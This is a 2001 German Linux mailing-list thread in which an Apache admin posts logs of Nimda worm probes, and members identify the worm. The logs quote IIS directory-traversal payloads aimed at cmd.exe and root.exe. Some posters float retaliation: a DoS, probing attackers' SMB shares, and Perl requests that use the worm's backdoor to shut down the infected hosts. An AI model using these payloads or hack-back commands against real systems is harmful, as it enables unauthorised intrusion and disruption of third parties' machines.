Hi! Ich habe seit heute komische Einträge in meinen Log-Files meines Apache-Webservers: X - - [18/Sep/2001:19:16:50 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:53 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:54 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:57 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:58 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:59 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:00 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:09 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:09 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:10 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:14 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:15 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:16 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 X - - [18/Sep/2001:19:17:19 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 X - - [18/Sep/2001:19:17:20 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:24 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 Im error-logfile steht natürlich "File doen't exists", was völlig logisch ist, hab ja kein Windows auf dem Server... Das ich ab und zu Einträge von CodeRed-Varianten habe, ist scheinbar noch normal *seufz* Weiß jemand, welcher Wurm oder sowas das sein könnte? cu Udo Neist -- Mail: udo.neist@t-online.de Hompage: http://home.tiscalinet.de/udoneist/ oder http://neist.dnsalias.org
Hallo Udo! On Tuesday 18 September 2001 21:40, Udo Neist wrote:
Ich habe seit heute komische Einträge in meinen Log-Files meines Apache-Webservers: [...] Weiß jemand, welcher Wurm oder sowas das sein könnte?
http://cert.uni-stuttgart.de/ticker/article.php?mid=480 Schöne Grüße, Stephan -- /* Stephan Hakuli -=-=-=- http://www.hakuli.de/stephan Encryption with GnuPG/GPG is strongly encouraged, my public key is available on my website. -=- Kernel_source_comment_of_the_month=\ `grep gently /usr/src/linux-2.2.19/arch/sparc/kernel/ptrace.c` */
On Tue, Sep 18, 2001 at 10:08:51PM +0200, Stephan Hakuli wrote:
Hallo Udo!
On Tuesday 18 September 2001 21:40, Udo Neist wrote:
Ich habe seit heute komische Einträge in meinen Log-Files meines Apache-Webservers: [...] Weiß jemand, welcher Wurm oder sowas das sein könnte?
Ich habs mir fast gedacht, das es der nimba-Wurm ist. Hab schon auf heise und auch von antivir.de ne Meldung gelesen. Zum Glück ist nur Windoof betroffen *gg* cu Udo -- Mail: udo.neist@t-online.de Hompage: http://home.tiscalinet.de/udoneist/ oder http://neist.dnsalias.org
kann mir zufällig jemand dasgen, wo ich mir den mc afee viren-scanner runterladen kann??? danke
-----Ursprüngliche Nachricht----- Von: Udo Neist [mailto:udo.neist@t-online.de] Gesendet: Dienstag, 18. September 2001 22:49 An: suse-linux@suse.com Betreff: Re: OT: Angriff auf Apache-Webserver mit Wurm
On Tue, Sep 18, 2001 at 10:08:51PM +0200, Stephan Hakuli wrote:
Hallo Udo!
On Tuesday 18 September 2001 21:40, Udo Neist wrote:
Ich habe seit heute komische Einträge in meinen Log-Files meines Apache-Webservers: [...] Weiß jemand, welcher Wurm oder sowas das sein könnte?
Ich habs mir fast gedacht, das es der nimba-Wurm ist. Hab schon auf heise und auch von antivir.de ne Meldung gelesen. Zum Glück ist nur Windoof betroffen *gg*
cu Udo -- Mail: udo.neist@t-online.de Hompage: http://home.tiscalinet.de/udoneist/ oder http://neist.dnsalias.org
-- Um die Liste abzubestellen, schicken Sie eine Mail an: suse-linux-unsubscribe@suse.com Um eine Liste aller verfügbaren Kommandos zu bekommen, schicken Sie eine Mail an: suse-linux-help@suse.com
Hi, Am Dienstag, 18. September 2001 23:17 schrieb jjspringer@gmx.de:
kann mir zufällig jemand dasgen, wo ich mir den mc afee viren-scanner runterladen kann???
Website von McAfee: http://www.mcafee.com Mfg, Ming-Che -- Ming-Che Lee (Mr.) Mailto:Ming-Che.Lee@aon.at
Hallo, Ming-Che Lee wrote: Tuesday, September 18, 2001 11:23 PM Subject: Re: AW: OT: Angriff auf Apache-Webserver mit Wurm
Hi,
Am Dienstag, 18. September 2001 23:17 schrieb jjspringer@gmx.de:
kann mir zufällig jemand dasgen, wo ich mir den mc afee viren-scanner runterladen kann???
Website von McAfee: http://www.mcafee.com
Wo auch sonst ;-) Gruss Guido
On Die, 18 Sep 2001, jjspringer@gmx.de wrote:
kann mir zufällig jemand dasgen, wo ich mir den mc afee viren-scanner runterladen kann???
Na, von http://www.mcafee.com/ (bzw. www.nai.com)... [ ] Du weisst, was ne Internet Suchmaschine ist GRRRRR: [TOFU inkl. SuSE-Footer] Leut's, ist Ignoranz eigentlich ansteckend? -dnh -- "Gna, schon wieder Seti [...] Dabei ist es schon schwierig genug, auf *diesem* Planeten intelligentes Leben zu finden." -- Charly Kuehnast in dasr
* David Haller
On Die, 18 Sep 2001, jjspringer@gmx.de wrote:
kann mir zufällig jemand dasgen, wo ich mir den mc afee viren-scanner runterladen kann???
Na, von http://www.mcafee.com/ (bzw. www.nai.com)...
[ ] Du weisst, was ne Internet Suchmaschine ist
GRRRRR: [TOFU inkl. SuSE-Footer]
Leut's, ist Ignoranz eigentlich ansteckend?
Ignoranz? Nicht mal in der Lage, seinen Namen als Absender anzugeben. flo -- On Boot's Children's cough medicine: Do not drive car or operate machinery. Auf Boots Hustenmedizin für Kinder: Fahren Sie nicht Auto und bedienen sie keine Maschinen.
Am Dienstag, 18. September 2001 23:17 schrieb jjspringer@gmx.de:
kann mir zufällig jemand dasgen, wo ich mir den mc afee viren-scanner runterladen kann???
Vielleicht bei www.mcafee.com, wäre doch naheliegend. Allerdings finde ich es schon sehr merkwürdig, wenn mir eine Virenscannerfirma auf ihrer Startpage erzählt, ich könnte ihre Seite nicht nutzen, weil ich das ach so nützliche JS deaktiviert habe. Ich persönlich würde Dir eher F-Prot (für DOS, ist sogar kostenlos) empfehlen http://www.frisk.is/f-prot. Und wenn Du gerade beim runterladen bist, solltest Du Dir gleich noch ein vernünftiges Mailprogramm mit runterziehen, weißt schon, Nimda und Co. sprechen Bände :) . regards Rüdiger
Am Dienstag, 18. September 2001 21:40 schrieb Udo Neist:
Ich habe seit heute komische Einträge in meinen Log-Files meines Apache-Webservers: X - - [18/Sep/2001:19:16:50 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 351 [...]
Im error-logfile steht natürlich "File doen't exists", was völlig logisch ist, hab ja kein Windows auf dem Server... Das ich ab und zu Einträge von CodeRed-Varianten habe, ist scheinbar noch normal *seufz* Weiß jemand, welcher Wurm oder sowas das sein könnte?
Vielleicht hilft Dir das hier weiter: http://www.heise.de/newsticker/data/ju-18.09.01-000/ Martin -- when in danger or in doubt, run in circles, scream and shout! pgp-key: via wwwkeys.de.pgp.net, key id is 0x21eec9b0
Am Dienstag, 18. September 2001 21:40 schrieb Udo Neist:
Hi!
Ich habe seit heute komische Einträge in meinen Log-Files meines Apache-Webservers:
X - - [18/Sep/2001:19:16:50 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:53 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:54 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:57 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:58 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:16:59 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c +dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:00 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c +dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:09 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:09 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:10 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:14 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:15 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:16 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 X - - [18/Sep/2001:19:17:19 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 X - - [18/Sep/2001:19:17:20 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351 X - - [18/Sep/2001:19:17:24 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351
Im error-logfile steht natürlich "File doen't exists", was völlig logisch ist, hab ja kein Windows auf dem Server... Das ich ab und zu Einträge von CodeRed-Varianten habe, ist scheinbar noch normal *seufz* Weiß jemand, welcher Wurm oder sowas das sein könnte?
cu Udo Neist
Das ist Code BLUE Gruss, Robert -- Where do you want to be tomorrow? Entracom. Building Linux systems. http://www.entracom.de
Am Wed, 19 Sep 2001 12:14:03 +0200 schrieb Robert Szentmihalyi
X - - [18/Sep/2001:19:17:24 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351
Im error-logfile steht natürlich "File doen't exists", was völlig logisch ist, hab ja kein Windows auf dem Server... Das ich ab und zu Einträge von CodeRed-Varianten habe, ist scheinbar noch normal *seufz* Weiß jemand, welcher Wurm oder sowas das sein könnte?
Das ist Code BLUE
Bingo! Gruß -- Andreas Meyer http://home.wtal.de/MeineHomepage
Am Mittwoch, 19. September 2001 12:32 schrieb Andreas Meyer:
Am Wed, 19 Sep 2001 12:14:03 +0200 schrieb Robert Szentmihalyi
: X - - [18/Sep/2001:19:17:24 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 351
Im error-logfile steht natürlich "File doen't exists", was
völlig
logisch ist, hab ja kein Windows auf dem Server... Das ich ab und zu Einträge von CodeRed-Varianten habe, ist scheinbar noch normal *seufz* Weiß jemand, welcher Wurm oder sowas das sein könnte?
Das ist Code BLUE
Muß und kann man was dagegen unternehmen ? uwe
Bingo!
Gruß
-- Uwe Wagner Tel: 06271/7698 Hohenstaufenstr. 60 Fax: 06271/72593 69412 Eberbach Uwe.Beach@gmx.de
Am Mi, 2001-09-19 20:29 schrieb Uwe Wagner:
Das ist Code BLUE
Muß und kann man was dagegen unternehmen ?
Es muss heissen: Sollte man etwas dagegen tun? ;-) Server abschalten würde wohl helfen, IPs sammeln, und DoS starten, um die Angreifer auszuschalten könnte auch was bringen (Ich hatte heute Morgen mal den ersten meiner nach-split Log's angepingt, der hat schon nicht mehr reagiert. Hat zwar nicht's zu sagen aber na ja.). Ansonsten hilft wohl wieder einmal nur: abwarten, bis alles vorüber ist und artig die Rechnung für den mehr-traffic zahlen. Hagen -- |#| Die drei wichtigsten Tugenden eines Programmierers: |#| Faulheit, Ungeduld und Selbstüberschätzung
On Wed, 19 Sep 2001, Hagen Kuehnel wrote:
Am Mi, 2001-09-19 20:29 schrieb Uwe Wagner:
Das ist Code BLUE
Muß und kann man was dagegen unternehmen ?
Es muss heissen: Sollte man etwas dagegen tun? ;-) Server abschalten würde wohl helfen, IPs sammeln, und DoS starten, um die Angreifer auszuschalten könnte auch was bringen
Nein, das ist sicherlich nicht feine Art. Ausserdem moechte ich jetzt hier keinen Thread ueber die strafrechtlichen Aspekte eines solchen Handelns lostreten. Natuerlich darf man sich ganz legal auf oeffentlich angebotenen Diensten orientieren. Ich greife da sehr gerne zu meinen Samba-Werkzeugen und schaue mir in Ruhe mittels smbclient auf den verheissungsvollen IPs die jeweiligen Umgebungen an. Ich weiss auch, dass ich - glueckt erst ein smbclient-Zugriff - natuerlich keinen Delete-Befehl durchfuehren darf.
Ansonsten hilft wohl wieder einmal nur: abwarten, bis alles vorüber ist und artig die Rechnung für den mehr-traffic zahlen.
Ja, das ist das fatale daran! Wir zahlen die Zeche auch noch! Gruss Peter Blancke -- Nachtwaechter ist der Wahnsinn, weil er wacht...
Am Mi, 2001-09-19 21:25 schrieb Peter Blancke:
Es muss heissen: Sollte man etwas dagegen tun? ;-) Server abschalten würde wohl helfen, IPs sammeln, und DoS starten, um die Angreifer auszuschalten könnte auch was bringen
Nein, das ist sicherlich nicht feine Art. Ausserdem moechte ich jetzt hier keinen Thread ueber die strafrechtlichen Aspekte eines solchen Handelns lostreten.
Sorry, war so auch nicht gemeint und keineswegs eine Aufforderung dazu. Ja, es ist wohl strafbar und wäre Selbstjustiz. Ein versuchter Angriff mittels diesen Wurm ist allerdings auch strafbar, immerhin handelt der admin des infizierten Servers mindestens fahrlässig, wenn nicht gar grob f.
Natuerlich darf man sich ganz legal auf oeffentlich angebotenen Diensten orientieren. Ich greife da sehr gerne zu meinen Samba-Werkzeugen und schaue mir in Ruhe mittels smbclient auf den verheissungsvollen IPs die jeweiligen Umgebungen an.
Gut, nur Zeit ist Mangelware und annähernd 100 IPs sammeln sich im Laufe des Tages leider an (code red in der Hochphase). Vielleicht lohnt es ja auch für die Zukunft, ein Skript mit dieser Funktionalität zu entwerfen. Es wird wohl erst der Anfang der "Wurmkur" sein.
Ja, das ist das fatale daran! Wir zahlen die Zeche auch noch!
So meinte ich dass obige, nur leider etwas härter ausgedrückt. Hagen -- |#| Die drei wichtigsten Tugenden eines Programmierers: |#| Faulheit, Ungeduld und Selbstüberschätzung
Am 19-Sep-2001 wuchtete Hagen Kuehnel folgendes in die Tasten:
Am Mi, 2001-09-19 20:29 schrieb Uwe Wagner:
Das ist Code BLUE
Mu� und kann man was dagegen unternehmen ?
Es muss heissen: Sollte man etwas dagegen tun? ;-) Server abschalten w�rde wohl helfen, IPs sammeln, und DoS starten, um die Angreifer auszuschalten k�nnte auch was bringen (Ich hatte heute Morgen mal den ersten meiner nach-split Log's angepingt, der hat schon nicht mehr reagiert. Hat zwar nicht's zu sagen aber na ja.). Ansonsten hilft wohl wieder einmal nur: abwarten, bis alles vor�ber ist und artig die Rechnung f�r den mehr-traffic zahlen.
<.ausschweif> Die angegriffenen Dateien durch eine Weiterleitung ersetzten. Man koennte auch ein Perl-Script (wie fuer CodeRed [../default.ida]) schreiben, dasz sowas wie new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWin dowsEx+5"); oder new HTTP::Request (GET => "http://$ENV{REMOTE_ADDR}/scripts/root.exe?/c+iisreset+/stop"); enthaelt und man dadurch den Remote-Host runterfaehrt. Anschlieszend noch AddHandler server-parsed .ida AddType text/html .ida in die *.conf einfuegen und das ganze dann durch Reply
Hallo, at Wednesday 19.09.2001 (20:29 +0200), Uwe Wagner wrote:
Muß und kann man was dagegen unternehmen ?
Nur gegen das Logfile, das auf mein heimischen Demo-Server mittlerweile auf 800 KB in 12h angewachsen ist. ;-) Gruß Michael -- Phone/Fax +49 7000 MACBYTE (+49 7000-6222983) // Registered Linux User #228306 HomePage http://www.macbyte-computing.de/ PGP-Key http://www.macbyte-computing.de/shared/mykey.pkr ++ CGI-Hosting ++ Domains ++ Webspace ++ PHP Development ++
On Wed, 19 Sep 2001, Michael Raab wrote:
at Wednesday 19.09.2001 (20:29 +0200), Uwe Wagner wrote:
Muß und kann man was dagegen unternehmen ?
Nur gegen das Logfile, das auf mein heimischen Demo-Server mittlerweile auf 800 KB in 12h angewachsen ist. ;-)
Das sollte es aber nicht. Oder betreibst Du daheim einen Webserver, der fuer die Oeffentlichkeit zur Verfuegung steht? Gegen das Anwachsen Deines Logfiles hilft wohl eher das Abschalten des HTTP-Ports bzw. die richtige Regel in iptables. Gruss Peter Blancke -- Nachtwaechter ist der Wahnsinn, weil er wacht...
Hallo, at Wednesday 19.09.2001 (21:26 +0200), Peter Blancke wrote:
Nur gegen das Logfile, das auf mein heimischen Demo-Server mittlerweile auf 800 KB in 12h angewachsen ist. ;-)
Das sollte es aber nicht. Oder betreibst Du daheim einen Webserver, der fuer die Oeffentlichkeit zur Verfuegung steht?
Jein. Der Indianer lauscht zwar, aber dient nur als Testserver für meine PHP-Entwicklungen um Traffickosten zu sparen. Und da ich mit jemanden zusammen arbeite, ist es unumgänglich diesen Server öffentlich zu machen. Gruß Michael -- Phone/Fax +49 7000 MACBYTE (+49 7000-6222983) // Registered Linux User #228306 HomePage http://www.macbyte-computing.de/ PGP-Key http://www.macbyte-computing.de/shared/mykey.pkr ++ CGI-Hosting ++ Domains ++ Webspace ++ PHP Development ++
participants (16)
-
Andreas Meyer
-
David Haller
-
Florian Gross
-
Guido Schiffer
-
Hagen Kuehnel
-
jjspringer@gmx.de
-
Martin Borchert
-
Michael Raab
-
Ming-Che Lee
-
Peter Blancke
-
Robert Szentmihalyi
-
Ruediger Nitzsche
-
Schneider Christian
-
Stephan Hakuli
-
Udo Neist
-
Uwe Wagner